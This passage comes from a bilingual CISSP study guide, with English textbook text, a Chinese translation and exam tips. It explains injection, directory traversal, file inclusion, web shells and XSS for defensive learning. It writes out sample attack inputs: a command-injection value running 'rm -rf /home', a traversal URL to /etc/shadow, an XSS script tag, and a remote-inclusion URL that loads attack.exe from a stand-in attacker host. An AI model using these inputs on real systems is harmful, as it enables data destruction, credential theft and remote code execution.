注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1424 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

Step-by-step、SOP 常对应 procedure。

渗透测试需要书面授权、范围和规则。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 31 / PDF P1425

第 1425 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

This might seem like a strange attack, but it can actually be used to extract information from the database. For example, imagine that the Accounts database table used in the previous example contains an unencrypted field named Password. An attacker could use a timing-based attack to discover the password by checking it letter by letter. The SQL to perform a timing-based attack is a little complex and you won't need to know it for the exam.

Instead, here's some pseudocode that illustrates how the attack works conceptually: For each character in the password For each letter in the alphabet If the current character is equal to the current letter, wait 15 seconds before returning results In this manner, an attacker can cycle through all of the possible password combinations to ferret out the password character by character. This may seem very tedious, but security tools like sqlmap and Metasploit automate blind timing-based attacks, making them quite straightforward. Code Injection Attacks SQL injection attacks are a specific example of a general class of attacks known as code injection attacks.

These attacks seek to insert attacker-written code into the legitimate code created by a web application developer. Any environment that inserts user-supplied input into code written by an application developer may be vulnerable to a code injection attack. Similar attacks may take place against other environments. For example, attackers might embed commands in text being sent as part of a Lightweight Directory Access Protocol (LDAP) query, conducting an LDAP injection attack. In this type of injection attack, the focus of the attack is on the backend of an LDAP directory service rather than a database server.

If a web server front end uses a script to craft LDAP statements based on input from a user, then LDAP injection is potentially a threat. Just as with a SQL injection, validation and escaping of input and defensive coding are essential to eliminate this threat. XML injection is another type of injection attack, where the backend target is an XML application. Again, input escaping and validation combats this threat. Commands may even attempt to load dynamically linked libraries (DLLs) containing malicious code in a DLL injection attack.

中文直译 / 整理

这看起来可能像一种奇怪的攻击,但实际上它可以用于从数据库中提取信息。 例如,假设前一个示例中使用的Accounts数据库表包含一个名为Password的 未加密字段。 攻击者可以使用基于时间的攻击,通过逐个字符检查来发现密码。 用于执行基于时间的攻击的SQL语句稍微复杂一些,考试时你不需要掌握它。 相反,以下是说明该攻击概念性原理的伪代码: 对于密码中的每个字符,遍历字母表中的每个字母:如果当前字符等于当前字母,则在返回结果 前等待15秒 通过这种方式,攻击者可以遍历所有可能的密码组合,逐字符破解密码。 这 看似非常繁琐,但像sqlmap和Metasploit这样的安全工具可以自动化执行 盲目的基于时间的攻击,使其变得相当简单。 代码注入攻击 SQL注入攻击是称为代码注入攻击的一类通用攻击的特例。 这些攻击旨在将攻 击者编写的代码插入到Web应用程序开发者编写的合法代码中。 任何将用户提 供的输入插入到应用程序开发者编写的代码中的环境,都可能面临代码注入攻 击的风险。 类似的攻击也可能发生在其他环境中。 例如,攻击者可能在作为轻量级目录访 问协议(LDAP)查询一部分发送的文本中嵌入命令,从而实施LDAP注入攻击。

在这种类型的注入攻击中,攻击重点在于LDAP目录服务的后端,而非数据库 服务器。 如果Web服务器前端使用脚本根据用户输入构建LDAP语句,则 LDAP注入可能构成威胁。 与SQL注入一样,输入验证、转义和防御性编码对 于消除这一威胁至关重要。 XML注入是另一种注入攻击类型,其后端目标是一个XML应用程序。 同样,输 入转义和验证可以抵御这种威胁。 命令甚至可能尝试加载包含恶意代码的动态 链接库(DLL),这称为DLL注入攻击。

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

程序:程序是一步一步怎么做。

注入攻击:注入攻击把恶意输入当命令或查询执行。

恶意代码:恶意代码包括病毒、蠕虫、木马、勒索软件等。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1425 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

防恶意代码要结合补丁、最小权限、检测、备份和用户培训。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
恶意代码 恶意代码包括病毒、蠕虫、木马、勒索软件等。
学习单元 32 / PDF P1426

第 1426 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Cross-site scripting is an example of a code injection attack that inserts script code written by an attacker into the web pages created by a developer. We'll discuss cross-site scripting in detail later in this chapter. Command Injection Attacks In some cases, application code may reach back to the operating system to execute a command. This is especially dangerous because an attacker might exploit a flaw in the application and gain the ability to directly manipulate the operating system. For example, consider the simple application shown in Figure 21.4. FIGURE 21.4 Account creation page This application sets up a new student account for a course.

Among other actions, it creates a directory on the server for the student. On a Linux system, the application might use a system() call to send the directory creation command to the underlying operating system. For example, if someone fills in the text box with: mchapple the application might use the function call: system('mkdir /home/students/mchapple') to create a home directory for that user. An attacker examining this application might guess that this is how the application works and then

中文直译 / 整理

跨站脚本攻击是代码注入攻击的一个例子,攻击者将自己编写的脚本代码插入 到开发者创建的网页中。 我们将在本章后面详细讨论跨站脚本攻击。 命令注入攻击 在某些情况下,应用程序代码可能会返回到操作系统以执行命令。 这尤其危险, 因为攻击者可能利用应用程序中的漏洞,获得直接操纵操作系统的权限。 例如, 考虑下面所示的简单应用程序图21.4。 图21.4账户创建页面 该应用程序为课程创建一个新的学生账户。 除了其他操作外,它还会在服 务器上为学生创建一个目录。 在Linux系统上,应用程序可能会使用 system()调用将目录创建命令发送到底层操作系统。 例如,如果某人在文 本框中输入: mchapple 应用程序可能会使用以下函数调用: system('mkdir /home/students/mchapple') 为该用户创建一个主目录。 攻击者在检查此应用程序时可能会猜测这就是应 用程序的工作方式,然后

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

程序:程序是一步一步怎么做。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1426 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
程序 程序是一步一步怎么做。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 33 / PDF P1427

认证:证明身份

认证回答“你是不是你声称的那个人”。

教材原文段落

supply the input: mchapple & rm -rf /home which the application then uses to create the system call: system('mkdir /home/students/mchapple & rm -rf /home') This sequence of commands deletes the /home directory along with all files and subfolders it contains. The ampersand in this command indicates that the operating system should execute the text after the ampersand as a separate command. This allows the attacker to execute the rm command by exploiting an input field that is only intended to execute a mkdir command.

Exploiting Authorization Vulnerabilities We've explored injection vulnerabilities that allow an attacker to send code to backend systems and authentication vulnerabilities that allow an attacker to assume the identity of a legitimate user. Let's now take a look at some authorization vulnerabilities that allow an attacker to exceed the level of access that they are authorized. OWASP The Open Worldwide Application Security Project (OWASP) is a nonprofit security project focused on improving security for online or web-based applications.

OWASP is not just an organization—it is also a large community that works together to freely share information, methodology, tools, and techniques related to better coding practices and more secure deployment architectures. For more information on OWASP and to participate in the community, visit http://owasp.org. OWASP also maintains a top 10 list of the most critical web application security risks at https://owasp.org/www-project-top-ten and the top 10 proactive controls to protect against application security issues at https://owasp.org/www-project-proactive-controls.

Both of these web pages would be a reasonable starting point for planning a security evaluation or penetration test of an organization's web services. Insecure Direct Object References

中文直译 / 整理

提供输入: mchapple & rm ‑rf /home 应用程序随后使用它来创建系统调用: system('mkdir /home/students/mchapple & rm ‑rf /home') 这一系列命令会删除/home目录及其包含的所有文件和子文件夹。 此命令中的与 号表示操作系统应将与号后的文本作为独立命令执行。 这使得攻击者能够通过 利用仅用于执行mkdir命令的输入字段来执行rm命令。 利用授权漏洞 我们已经探讨了允许攻击者向后端系统发送代码的注入漏洞,以及允许攻击者 冒充合法用户身份的认证漏洞。 现在让我们来看看一些允许攻击者超越其授权 访问级别的授权漏洞。 OWASP 开放Web应用程序安全项目(OWASP)是一个非营利性安全项目,致力于 提高在线或基于Web应用程序的安全性。 OWASP不仅是一个组织,也是一 个庞大的社区,共同协作免费共享信息, 与更优编码实践和更安全的部署架构相关的方法、工具和技术。 有关 OWASP的更多信息及参与社区,请访问http://owasp.org。

OWASP还维护着最严重的Web应用程序安全风险的前十名列表,位于 https://owasp.org/www-project-top-ten,以及保护应用程序安全问题的十大主动 控制措施,位于 https://owasp.org/www-project-proactive-controls. 这两个网页都可以作为规划对组织Web服务进行安全评估或渗透测试的合理起 点。 不安全的直接对象引用

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证回答“你是不是你声称的那个人”。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“认证:证明身份”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
日志 日志记录系统和用户活动,用于监控、审计和调查。
注入攻击 注入攻击把恶意输入当命令或查询执行。
学习单元 34 / PDF P1428

授权、审计与问责

认证后还要授权,之后靠审计和日志追责。

教材原文段落

In some cases, web developers design an application to directly retrieve information from a database based on an argument provided by the user in either a query string or a POST request. For example, the following query string might be used to retrieve a document from a document management system (replacing [companyname] with the name of the particular organization, of course): https://www.[companyname].com/getDocument.php?documentID=1842 There is nothing wrong with this approach, as long as the application also implements other authorization mechanisms.

The application is still responsible for ensuring that the user is properly authenticated and is authorized to access the requested document. The reason for this is that an attacker can easily view this URL and then modify it to attempt to retrieve other documents, such as in these examples: https://www.mycompany.com/getDocument.php?documentID=1841 https://www.mycompany.com/getDocument.php?documentID=1843 https://www.mycompany.com/getDocument.php?documentID=1844 If the application does not perform authorization checks, the user may be permitted to view information that exceeds their authority. This situation is known as an insecure direct object reference.

Canadian Teenager Arrested for Exploiting Insecure Direct Object Reference In April 2018, Nova Scotia authorities charged a 19-year-old with “unauthorized use of a computer” when he discovered that the website used by the province for handling Freedom of Information requests had URLs that contained a simple integer corresponding to the request ID. After noticing this, the teenager simply altered the ID from a URL that he received after filing his own request and viewed the requests made by other individuals. That's not exactly a sophisticated attack, and many cybersecurity professionals (your authors included) would not even consider it an attempted attack.

Eventually, the authorities recognized that the province IT team was at fault and dropped the charges against the teenager.

中文直译 / 整理

在某些情况下,Web开发人员会设计应用程序,根据用户在查询字符串或 POST请求中提供的参数直接从数据库中检索信息。 例如,以下查询字符串可 用于从文档管理系统中检索文档(当然,需将[companyname] 替换为特定组织 的名称): https://www.[companyname].com/getDocument.php?documentID=1842 这种方法没有问题,只要应用程序还实现了其他授权机制即可。 应用程序 仍需确保用户已正确身份验证,并有权访问所请求的文档。 原因是攻击者可以轻松查看此URL,然后对其进行修改,以尝试获取其他文档, 例如以下示例: https://www.mycompany.com/getDocument.php?documentID=1841 https://www.mycompany.com/getDocument.php?documentID=1843 https://www.mycompany.com/getDocument.php?documentID=1844 如果应用程序未执行授权检查,用户可能被允许查看超出其权限的信息。 这 种情况被称为不安全的直接对象引用。

加拿大青少年因利用不安全的直接对象引用被逮捕 2018年4月,新斯科舍当局指控一名19岁青年“未经授权使用计算机”, 因为他发现该省用于处理信息自由请求的网站所使用的URL中包含一个 对应于请求ID的简单整数。 在注意到这一点后,这名青少年简单地修改了他在提交自己请求后收到的 URL中的ID,从而查看了其他人的请求。 这并非一种复杂的攻击,许多网 络安全专业人员(包括我们的作者)甚至不会将其视为一次尝试性攻击。 最终,当局认识到该省的IT团队存在过错,于是撤销了对这名青少年的指 控。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:认证后还要授权,之后靠审计和日志追责。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

程序:程序是一步一步怎么做。

身份:身份是主体在系统中的标识。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“授权、审计与问责”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

Step-by-step、SOP 常对应 procedure。

身份管理题要区分识别、认证、授权、审计。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
程序 程序是一步一步怎么做。
身份 身份是主体在系统中的标识。
学习单元 35 / PDF P1429

第 1429 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Directory Traversal Some web servers suffer from a security misconfiguration that allows users to navigate the directory structure and access files that should remain secure. These directory traversal attacks work when web servers allow the inclusion of operators that navigate directory paths, and file system access controls don't properly restrict access to files stored elsewhere on the server. For example, consider an Apache web server that stores web content in the directory path /var/www/html/. That same server might store the shadow password file, which contains hashed user passwords, in the /etc directory as /etc/shadow.

Both of these locations are linked through the same directory structure, as shown in Figure 21.5.

中文直译 / 整理

目录遍历 一些Web服务器存在安全配置错误,允许用户浏览目录结构并访问本应受到保 护的文件。 这些目录遍历攻击在Web服务器允许使用导航目录路径的操作符, 而文件系统访问控制未能正确限制对服务器上其他位置存储文件的访问时发生。 例如,考虑一个将网页内容存储在目录路径/var/www/html/中的 Apache Web 服务器。 该服务器可能将包含哈希用户密码的影子密码文件存储在/etc目 录中,路径为/etc/shadow。 这两个位置通过相同的目录结构关联,如图 21.5所 示。

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1429 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 36 / PDF P1430

第 1430 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

FIGURE 21.5 Example web server directory structure If the Apache server uses /var/www/html/ as the root location for the website, this is the assumed path for all files unless otherwise specified. For example, if the site was www.mycompany.com, the URL www.mycompany.com/account.php would refer to the file /var/www/html/account.php stored on the server. In Linux operating systems, the .. operator in a file path refers to the directory one level higher than the current directory. For example, the path /var/www/html/../ refers to the directory that is one level higher than the html directory, or /var/www/.

中文直译 / 整理

图 21.5 示例 Web 服务器目录结构 如果 Apache 服务器使用 /var/www/html/ 作为网站的根目录,则在未另行指定的情况下,所 有文件均默认采用此路径。 例如,如果站点为 www.mycompany.com,则 URL www.mycompany.com/account.php 将指向服务器上存储的文件 /var/www/html/account.php。 在 Linux 操作系统中,文件路径中的 .. 操作符表示比当前目录高一级的目 录。 例如,路径 /var/www/html/../ 表示比 html 目录高一级的目录,即 / var/www/。

小白解释

场景先行:你是公司的安全负责人,正在读第 1430 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1430 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 37 / PDF P1431

第 1431 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Directory traversal attacks use this knowledge and attempt to navigate outside of the areas of the file system that are reserved for the web server. For example, a directory traversal attack might seek to access the shadow password file by entering this URL: http://www.mycompany.com/../../../etc/shadow If the attack is successful, the web server will dutifully display the shadow password file in the attacker's browser, providing a starting point for a bruteforce attack on the credentials. The attack URL uses the .. operator three times to navigate up through the directory hierarchy. If you refer back to Figure 21.5 and use the /var/www/html directory as your starting point, the first ..

operator brings you to /var/www, the second brings you to /var, and the third brings you to the root directory, /. The remainder of the URL brings you down into the /etc/ directory and to the location of the /etc/shadow file. File Inclusion File inclusion attacks take directory traversal to the next level. Instead of simply retrieving a file from the local operating system and displaying it to the attacker, file inclusion attacks actually execute the code contained within a file, allowing the attacker to fool the web server into executing targeted code.

File inclusion attacks come in two variants: Local file inclusion attacks seek to execute code stored in a file located elsewhere on the web server. They work in a manner very similar to a directory traversal attack. For example, an attacker might use the following URL to execute a file named attack.exe that is stored in the C:\www\uploads directory on a Windows server: http://www.mycompany.com/app.php? include=C:\\www\\uploads\\attack.exe Remote file inclusion attacks allow the attacker to go a step further and execute code that is stored on a remote server.

These attacks are especially dangerous because the attacker can directly control the code being executed without having to first store a file on the local server. For example, an attacker might use this URL to execute an attack file stored on a remote server:

中文直译 / 整理

目录遍历攻击利用这一知识,试图跳出 Web 服务器所限定的文件系统区域。 例如,目录遍历攻击可能通过输入以下 URL 来尝试访问 shadow 密码文件: http://www.mycompany.com/../../../etc/shadow 如果攻击成功,Web服务器将忠实地在攻击者的浏览器中显示shadow密码文 件,为暴力破解凭证提供起点。 该攻击URL使用..操作符三次,以在目录层次 结构中向上导航。 如果参考图21.5并以/var/www/html目录作为起点,第一个.. 操作符将带你到/var/www,第二个将带你到/var,第三个将带你到根目录/。 URL的其余部分将带你进入/etc/目录,并到达/etc/shadow文件的位置。 文件包含 文件包含攻击将目录遍历提升到下一个级别。 与简单地从本地操作系统检索文 件并显示给攻击者不同,文件包含攻击实际上会执行文件中包含的代码,使攻 击者能够欺骗Web服务器执行目标代码。 文件包含攻击有两种变体: 本地文件包含攻击旨在执行存储在Web服务器其他位置的文件中的代码。 其工作方式与目录遍历攻击非常相似。

例如,攻击者可能使用以下 URL来执行存储在Windows服务器的C:\www\uploads目录中的名为 attack.exe的文件: http://www.mycompany.com/app.php? include= C:\\www\\uploads\\attack.exe 远程文件包含攻击允许攻击者更进一步,执行存储在远程服务器上的代码。 这些攻击尤其危险,因为攻击者无需先将文件存储在本地服务器上,即可 直接控制要执行的代码。 例如,攻击者可能使用以下URL来执行存储在远 程服务器上的攻击文件:

小白解释

场景先行:你是公司的安全负责人,正在读第 1431 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1431 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 38 / PDF P1432

第 1432 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

http://www.mycompany.com/app.php? include=http://evil.attacker.com/attack.exe When attackers discover a file inclusion vulnerability, they often exploit it to upload a web shell to the server. Web shells allow the attacker to execute commands on the server and view the results in the browser. This approach provides the attacker with access to the server over commonly used HTTP and HTTPS ports, making their traffic less vulnerable to detection by security tools.

In addition, the attacker may even repair the initial vulnerability they used to gain access to the server to prevent its discovery by another attacker seeking to take control of the server or by a security team who then might be tipped off to the successful attack. Exploiting Web Application Vulnerabilities Web applications are complex ecosystems consisting of application code, web platforms, operating systems, databases, and interconnected application programming interfaces (APIs). The complexity of these environments, combined with the fact that they are often public-facing, makes many different types of attacks possible and provides fertile ground for penetration testers.

We've already looked at a variety of attacks against web applications, including injection attacks, directory traversal, and more. In the following sections, we round out our look at web-based exploits by exploring cross-site scripting, cross-site request forgery, and session hijacking. Cross-Site Scripting (XSS) Cross-site scripting (XSS) attacks occur when web applications allow an attacker to perform HTML injection, inserting their own HTML code into a web page. Reflected XSS XSS attacks commonly occur when an application allows reflected input. For example, consider a simple web application that contains a single text box asking a user to enter their name.

When the user clicks Submit, the web application loads a new page that says, “Hello, name.” Under normal circumstances, this web application functions as designed. However, a malicious individual could take advantage of this web application http://www.mycompany.com/app.php? include=http://evil.attacker.com/attack.exe

中文直译 / 整理

当攻击者发现文件包含漏洞时,他们通常会利用它上传一个Web壳到服务 器。 Web壳允许攻击者在服务器上执行命令,并在浏览器中查看结果。 这 种方法使攻击者能够通过常用的HTTP和HTTPS端口访问服务器,使其流 量更不易被安全工具检测到。 此外,攻击者甚至可能修复他们用来获取服 务器访问权限的初始漏洞,以防止其他攻击者或安全团队发现该漏洞,从 而避免被察觉到成功的攻击。 利用Web应用程序漏洞 Web应用程序是由应用代码、Web平台、操作系统、数据库和互连的应用 程序编程接口(API)组成的复杂生态系统。 这些环境的复杂性,加上它们通 常面向公众的特点,使得多种类型的攻击成为可能,并为渗透测试人员提供了 丰富的目标。 我们已经研究了多种针对Web应用程序的攻击,包括注入攻击、 目录遍历等。 在以下章节中,我们将通过探讨跨站脚本、跨站请求伪造和会话 劫持,完善对基于Web的攻击的分析。 跨站脚本(XSS) 跨站脚本(XSS)攻击发生在Web应用程序允许攻击者执行HTML注入时, 即将其自身的HTML代码插入到网页中。 反射型XSS 当应用程序允许反射输入时,XSS攻击通常会发生。

例如,考虑一个简单的 Web应用程序,其中包含一个文本框,要求用户输入他们的姓名。 当用户点 击提交时,Web应用程序会加载一个新页面,显示“您好,name。 ” 在正常情况下,此Web应用程序按设计运行。 然而,恶意用户可能利用此Web应 用程序

小白解释

场景先行:开发团队要上线登录功能。安全不是上线前扫一下漏洞,而是从需求、设计、编码、测试、发布到运维都要参与。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:安全太晚介入,修复成本高,还可能把漏洞带到生产环境。

你作为负责人可以这样想:在 SDLC 早期做威胁建模、代码审查、测试和发布控制。

本页术语用人话说:

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

程序:程序是一步一步怎么做。

渗透测试:渗透测试在授权范围内模拟攻击验证风险。

注入攻击:注入攻击把恶意输入当命令或查询执行。

常见误区:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

读完后用一句话复述:如果我是应用安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1432 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是应用安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

Step-by-step、SOP 常对应 procedure。

渗透测试需要书面授权、范围和规则。

SQL 注入、命令注入常靠输入验证、参数化查询防御。

输出编码、输入验证、CSP 可降低 XSS 风险。

排除法提醒:不要只靠上线前一次扫描;安全要嵌入整个生命周期。

本页术语拆解
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
程序 程序是一步一步怎么做。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
注入攻击 注入攻击把恶意输入当命令或查询执行。
跨站脚本 XSS XSS 把脚本注入到网页,让浏览器执行。
学习单元 39 / PDF P1433

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

to trick an unsuspecting third party. As you may know, you can embed scripts in web pages by using the HTML tags <SCRIPT> and </SCRIPT>. Suppose that, instead of entering Mike in the Name field, you enter the following text: Mike<SCRIPT>alert('hello')</SCRIPT> When the web application “reflects” this input in the form of a web page, your browser processes it as it would any other web page: it displays the text portions of the web page and executes the script portions. In this case, the script simply opens a pop-up window that says “hello” in it.

